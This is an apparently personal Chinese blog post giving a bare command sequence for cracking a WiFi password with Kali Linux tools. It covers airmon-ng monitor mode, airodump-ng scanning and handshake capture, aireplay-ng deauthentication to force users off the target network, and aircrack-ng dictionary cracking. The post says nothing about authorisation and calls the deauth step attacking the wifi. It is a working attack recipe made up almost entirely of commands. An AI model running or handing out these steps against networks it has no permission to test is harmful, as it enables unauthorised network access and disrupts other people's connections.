- ifconfig 查看网卡信息 显示有wlan0即为无线网卡
- airmon-ng start wlan0 启动网卡监听模式
- ifconfig 看看网卡名是不是变成了wlan0mon,是则启动成功
- airodump-ng wlan0mon 扫描附近wifi后,出现要破解的wifi,ctrl+C停止扫描
1
2
3
4
5BSSID:MAC地址(记录1)
PWR:信号强度
#Data:传输的数据
CH:信号频道(记录2)
ESSID:wifi名称 - airodump-ng -c 记录2 –bssid 记录1 -w 握手包存放路径
- aireplay-ng -0 0 -a 记录1 wlan0mon 攻击wifi使连接用户其重新连接,记得及时关闭
- 抓包界面右上角出现 WPA handshake:XX:XX:XX:XX:XX:XX 即为抓包成功,可关闭转包界面
- airmon-ng stop wlan0mon 关闭网卡监听状态
- 破解密码
aircrack-ng -w 字典路径 /握手包路径
本文作者:
yd0ng
本文链接: https://yd0ng.github.io/2020/02/25/kali%E7%88%86%E7%A0%B4WiFi%E5%AF%86%E7%A0%81/
版权声明: 本作品采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可。转载请注明出处!
本文链接: https://yd0ng.github.io/2020/02/25/kali%E7%88%86%E7%A0%B4WiFi%E5%AF%86%E7%A0%81/
版权声明: 本作品采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可。转载请注明出处!